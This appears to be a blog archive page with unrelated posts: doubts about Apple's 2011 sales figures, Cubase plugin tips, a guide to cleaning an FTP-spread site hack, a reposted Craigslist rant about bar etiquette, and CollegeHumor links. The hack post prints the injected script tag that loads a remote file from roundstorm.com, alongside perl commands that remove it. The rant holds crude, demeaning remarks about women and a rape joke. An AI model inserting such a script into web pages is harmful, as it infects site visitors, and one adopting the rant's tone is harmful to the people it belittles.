You’ve heard, by now, the news on Apple bringing in 46 billion in revenue, doubling their profit from the year before. Much of the earnings have come from 37 million iPhones sold (128% increase), roughly 15.5 million iPads (111% increase), 5.2 million Macs (26% increase), and some iPods. But take a minute and let’s look under the hood …

To preface the following … this article is to raise some concern and is by no measure an anti-apple article or stating even an opinion on the situation.

Many articles have professed the profits and thrown around words like market share and revenue and Q1 etc. Many of these articles seem to have generated facts from a Marketing company that is hired by Apple by the name of Kantar. Kantar has worked with Apple in the past to help with press releases and possibly Market Analysis and research.

Why is this important?

Take Reuter’s for instance. Reuter’s is a heavily read source of what should be legitimate information about companies that investors are interested in investing in. Here is an article on reuters.com that talks about the Apple 13 billion news which appears to have been fed to them, not by Apple, but Kantar. Click here to see the article. This article states that Apple has doubled it’s U.S. market share. With the numbers that are being thrown around in sales by article’s

TLDR ... this girl with an iPhone is hot

like this from GoldPriceNetwork it seems plausible and even leads you to believe not only is Apple back on top but other companies are losing their edge.

This news, of course, comes after what appeared to be a tough season with the Amazon Kindle Fire breaking iPad weekly sales records and the iPhone slipping in the mainstream reviews from being the top smartphone to buy. Reuters, earlier in 2011, had even released a market share report explaining Apple bowing to Samsung in market share. Now in spite of the news from Kantar stating iPad is up 111%, here is an article just released explaining a report by Strategy Analytics showing iPad down 11% in 2011 with Android taking the market share. Is this he-said-she-said? Is this one side or both sides spinning information to make them respectively look better?

Here is where you may find your answer. All the news articles can state their fluff but you can’t argue with the stats that web developers have come to use for determining industry standard and how to build for the web. My company uses a mixture of statistics from w3schools.com and statcounter.com to determine what OS people are mostly running, browser stats and trends, flavor of browser, mobile OS, screen resolutions and more. Now these stats are not thought of by us to be absolutely accurate, but a solid general marker for what is going on.

The thing that make’s you go hmmm.

W3 browser stats show no increase: Oct 2011 – Dec 2011 a flat 4.2% of the Safari browser being used. Safari started the year with 4.0% of the Browser share

W3 OS stats show a decline: Oct 2011 – 8.9%, Nov 2011 – 8.6%, Dec 2011 8.5% of the OS share starting the year at 7.8%

Someone sold her a knockoff iPhone but she's still happy

MobileOS iPhone stats slight increase: Oct 2011 – .19%, Nov 2011 – .19%, Dec 2011 – .20% starting the year with .18% – this percentage is based on smart devices now being considered PCs – note Android OS was registered .28%, .30%, .35 respectively.

Statcounter OSx worldwide stats show MacOS decline: Oct 2011 – 7.18%, Nov 2011 – 7.05%, Dec 2011 – 7.01%

Statcounter OSx North America stats show MacOS decline: Oct 2011 – 14.92%, Nov 2011 – 13.64%, Dec 2011 – 14.12%

Statcounter iOS North America stats show MacOS .42% increase: Oct 2011 – 1.96%, Nov 2011 – 2.02%, Dec 2011 – 2.38%

Strictly Mobile OS stats

Statcounter iOS worldwide stats show iOS decline: Oct 2011 – 23.48%, Nov 2011 – 24.21%, Dec 2011 – 22.71% – note Android 22.71%

Statcounter iOS North Am stats show iOS 2.48% increase: Oct 2011 – 40.04%, Nov 2011 – 42.79%, Dec 2011 – 42.52% – note Android holds 40.92%

One big thing to note from StatCounter is that the true MobileOS champ is neither iOS or Android but Symbian holding 33.46% of the worldwide MobileOS market which is 10% more than iOS or Android have.

Now dem are some Apples!

Explaining the question

In a few cases you can see Apple has grown slightly, but that is the problem. Even if these stats are not absolutely accurate, they are also not completely way off on their stats. Neither W3 nor Statcounter have registered a spike or notable growth for Macs nor iOS or even the browsers that might be used respectively. Looking at the stats, it is very hard to explain the news in relation to the real statistics out on the web. Either all the new Apple purchasers are not using their devices and laptops to surf the web, Statcounter and W3 have broken reports, or someone is not reporting the real facts and numbers. Either way, this is for the powers that be to wonder about before they go writing articles parroting hired marketing agencies.

A common setup with Cubase from 3.0 on is to install Komplete instrument sets and vst plugins. Anyone using this setup will and can experience random garbling of a track, midi instrument, or random effects. This random situation can show up by having a great recording session where everything sounds great and then reopening the project later to find a midi track causing static to the playback.

TLDR

Remove unneeded tracks

Remove any effects from tracks not being used or needed

Unload any VST intruments that are not being used for the current project

Consolidate tracks if you can

To explain my setup in particular:

AMD 2.6 Quadcore
4 gigs of ram
SATA 300 Baracudas
M-Audio Fast Track Pro
Cubase 5
Acid 6
Komplete 5 and 6
Amplitube – Hendrix, Fender
Voxengo
Antares Vocal FX etc.
Synthology Pianos

What appears to happen is that as you add tracks to Cubase and effects to those tracks, Cubase has to always keep those loaded and ready to go – even if you have them muted or you have the effect on the track turned off.

1 solution is to remove any effects that you don’t need from your various tracks. Also unload any instruments you are not needing for the current project. Finally, consolidate tracks if you can. I was using 4 tracks for one guitar line and working at perfecting that single instrument. Having Guitar Rig running for 4 tracks of the same instrument was causing problems. I moved all the tracks to one and deleted the other tracks and the problem was fixed.

If you have a full powered system and need the tons of tracks and you are using instruments. Look into Cubase VST Link. This can be a little trying to get working, however, the benefit is that you can link additional computers to each other and dedicate, for instance, one computer to only handle you instruments. This second computer does not necessarily have to be a full quadcore etc. Since you are dedicating the machine to one function a powerful single or dual core could many times do the trick.

This past weekend a few of my FTP accounts got hacked via a Java virus that is being spread via roundstorm.com, I posted some more info and a fix below.

The following code was being injected into all Javascript files found via FTP.

document.write('');

All index/home/footer & header HTML files had this code

<script src="http://roundstorm.com:8080/Finder.js" type="text/javascript"><!--mce:0--></script><br /><!--4561fc54d91b71ee303e54dd3da18ccf-->

Solution

Via shell access to your server you can run the following command:

perl -pi -w -e 's/(\n?)( ?)document.write.*ipt&gt;.\);/ /g' `grep -ril roundstorm *`<br />perl -pi -w -e 's/.*roundstorm.*|.*4561fc54d91b71ee303e54dd3da18ccf.*/ /g' `grep -ril 4561fc54d91b71ee303e54dd3da18ccf *`<br />

NOTE Replace the unique identifier on the last line from “4561fc54d91b71ee303e54dd3da18ccf” to whatever is found in your html files. This command basically searches all files for the unique roundstorm identifier and removes it. This ID is going to be different for each FTP account that has been hacked.

This command finds all files infected with the roundstorm hack and remove the infected code.

After you clean up the files run a virus clean up on your computer. I used malwarebytes. Also remember to upadate all your FTP PASSWORDS and DO NOT save any FTP information on your FTP Client.

There is also another blogger reporting the same hack here: http://wpguru.co.uk/2010/07/the-drunkjeans-com-wordpress-hack-and-how-to-get-rid-of-it/

UPDATE: 07/21/2010
Other solutions:

Restore a backup of the site. If you have cPanel or Plesk this should be easy.

If your site is in a version control system you can simply revert all changed files.

Nick, from our comments area below, suggested a PHP script would be more helpful for those users who do not have shell access. Let me know via the comments area if this is in high demand, I can probably devote some time to creating a script this week.

Craigslist: Why I DIDN’T buy you a drink.

Here we go again. – m4w – 22 (Downtown)
Date: 2010-01-12, 11:55AM MST
Reply To This Post

So a couple of weeks ago a put up a post regarding the etiquette of intersexual drink-buying at bars. Lo and behold, this past weekend a friend of mine got burned at the tav by falling for the exact trap that my post warned against. Accordingly, I felt compelled to repost for the benefit of all the beautiful women in Salt Lake who don’t want to scroll all the way down to find the original post. This may be redundant, but I cannot in good conscience let this phenomenon go overlooked. So here it is again: Why I didn’t Buy You a Drink.

You: Cute girl at the bar.
Me: The guy you chatted with while waiting for our drinks.
The Topic: Why I didn’t buy you a drink.
The Audience: Women everywhere, please read this. I know it’s long, but I feel the length is expedient to truly illustrating and arguing my point.

I was waiting to order right as things were getting crazy. It was obvious that it would be a long wait. What can I say? I can’t compete with all the douches yelling for jager bombs. It was then that you appeared. A cute, petite, slightly hipster-ish girl standing next to me, waiting to order as well. The conversation began in the typical manner, simply relating on how frustrating it is when you spend half a night out just waiting for a drink. It then evolved into a true conversation. I spent the next twenty minutes finding out you have great taste in music, movies and literature. You laughed at my jokes, and that’s a big deal to average-looking guys like me.
Unfortunately, after we’d both finished our respective drinks, but were still immersed in discussion, you dropped a bomb that sent shrapnel into my heart.

“So are you gonna buy me a drink or what?”

I had been dreading this moment. I’ve learned from hard experience that any prolonged conversation with a girl at a club or a bar inevitably requires a fee of rum and coke, vodka tonic, or God forbid, a cosmo. As cute as you were, I felt obligated to retain my self-respect.

“Sorry, I don’t buy girls drinks. Just kind of my policy.”

You looked at me like I told you I was going to rape your dog Charlie (yes, I remember his name). Your face morphed from a beautiful smile into a twisted caricature of shock, revulsion, and utter disbelief.

“Seriously, you’re not gonna buy me a drink? What’s your problem?”

Well sweetheart, let me explain to you in detail my logic regarding this decision that you found so unbelievable:

1. I’ve been going to bars for a couple of years now. I enjoy meeting people when I do. I enjoy meeting attractive girls like yourself. I have, however, learned that buying girls drinks is a sucker’s game. Yes, it has developed into sharing my bed for the night a couple times, but 90% of the time, all it does is give me a higher bar tab. Now you might say I’m a prick for expecting a girl to sleep with me just because I buy her a drink. I agree an $8 cocktail does not and should not equal a sexual encounter. However, I believe spending time and money on a girl when I could be having a good night out with my friends does entitle me at least one of the following things: You reciprocating by buying me a drink, you giving me your phone number and/or going out on a date with me, where once again I will be spending time and money on you. Notice that sex is not a requirement or expectation that is coupled with any of these options. Now, of course, if I had offered to buy you a drink, and you accepted, you are not obligated to any of these things. The big distinction here is that you asked me to buy you a drink, and were shocked that I wouldn’t do so. This brings me to my second point.

2. You know exactly what you’re doing. You’re an attractive girl, and when you go out there is no shortage of guys offering to buy you drinks. You know that they are all doing so with the hope that it will lead to sex with you. You know that it’s not going to happen, but you will accept the free drinks anyway. I don’t hold this against you. If they’re dumb enough to think that buying you a drink is the key to your heart and that they are somehow different from the other Ed Hardy-wearing frat-bros then it’s their own damn fault. You’re using your god-given assets to get free alcohol, nothing wrong with that. But it is precisely because I know that you do this that I will not be another douche who thinks he can get into your pants with a mixed drink. It’s insulting to my dignity as a man and your honor as a woman. I noticed you when you first walked in. I saw you dancing with that hopeless collar-popper. I saw him go to the bar and bring a drink back to you on the dancefloor. I saw how the second the glass was in your hand, you gave him the “Thanks for the drink, it was really nice meeting you” treatment complete with the obligatory pat on the chest. I saw the pathetic, defeated look on his face as you walked away. He will enter the next round of bar hopping a little wiser I hope.

3. You took my unwillingness to fall into such a trap as an insult. You accused me of being stuck-up. You then said that I had a chance at fucking you, but that I’d ruined it by being an asshole. What exactly are you trying to tell me? That the asinine idea that getting a girl a drink will get you in her pants is actually true? That your decision of whether or not to sleep with a guy is based on him liquoring you up? We had a good conversation, and maybe you were actually interested in me. But the fact that any rapport we built was destroyed when I wouldn’t buy you a gin and tonic means that I am no longer interested in you. Not all guys are desperate sperm donors. Some of us actually value a good conversation, and we value girls who have enough respect for themselves that they don’t view sex as a transaction.

4. We established during our conversation that we are both broke-ass fine arts students. Why then would you expect that I, someone who shares your financial woes, would want to spend money on you, a girl I just met? I don’t believe that chivalry is dead. I’ll hold a door for you, I’ll pull out your chair or take your coat. I’ll help you change a flat tire, carry you over deep puddles, figure out the remote, reset your modem. I’ll even help you move when I know you a little better. Why? Because I’m a gentleman. I will not, however, buy you a drink under the pretense that it is what a gentleman does, because I simply cannot afford it. If you want a guy who can afford to buy you whatever you want, find a fifty year-old sugar daddy. There was no shortage of potentials at the bar the other night.

I hope this illustrated my thought-process clearly enough. I hope you realize that you seemed amazing at first, and that declining to buy you a drink was in no way an insult. Your reaction, however, revealed the self-entitled, game-playing she-devil that was lurking underneath. I thank god for the out that he provided at that moment though. Just after you finished your little rant on what I dick I was for not boozing you up, a group of girls emerged at the bar right behind you. Two of these girls were thin and pretty. They immediately got the attention of some bros and had free drinks within minutes. The third girl was overweight and out of place. She had clearly spent a great deal of time and effort on her appearance, but alas, she was once again forsaken by her prettier friends and left to stand by herself, looking miserable. Luckily, I know when the universe has given me a profound gift. There were two incredible moments that filled me with an elation that could not be rivaled by the orgasm I would have had while fucking you. The first was the sincere, excited smile that the chubby girl gave me when I moved past you and asked what she wanted to drink. The second was turning back and seeing the look of horror on your face. You pathetic “have fun with the fatty” remark as you walked away was priceless. I may be broke, but I was willing to go into the red to make this girl’s night and to piss you off. I’m sure as soon as you left you got plenty of free drinks and plenty of idiots drooling over you. I just hope that I got under your skin enough to prevent any enjoyment of those things.

I had a great night. I introduced the big girl to an open-minded friend, and as I write this they are across the hall having loud sex. Normally going to bed alone, subjected to the sounds of raucous lovemaking across the hall would be a serious downer. But tonight, as I crawl into my lonely bed, I will go to sleep comforted by the fact that I have retained my self-respect. Having encountered more than a few spoiled bimbos, I infer that sex with you would have consisted of you lying on your back expecting me to be so grateful that I’m seeing your “hot” naked bod makes up for the fact that you are putting absolutely no effort into this sexual experience. This may just be me trying to justify going to bed alone tonight, but hey, what can you do?

The moral: Ladies, accept drinks if they are offered. Do not expect them. And if you’re feeling particularly wild on a given night, offer to buy the guy a drink. He will be instantly smitten.

Since this thing is 3+ years old I’m sure a bunch of you have seen this before, but I felt it was worth posting again. This was actually the “series” that really got me hooked on reading CollegeHumor.com every day. When I first came across their prak wars, I thought they were hilarious. I felt that Streeter’s pranks were better than Amir’s, at least until Prank Wars 4: Streeter Bombs. Regardless, these are funny as hell and I can’t wait until the next prank is pulled.

CollegeHumor.com compiled the Best Fails of 2009 into one video. I’ll pretty much have to agree with them. A bunch of the one’s included in this video I’ve seen and winced at, before watching them again with the rest of the office. Others I hadn’t seen, but I’m glad I did now.
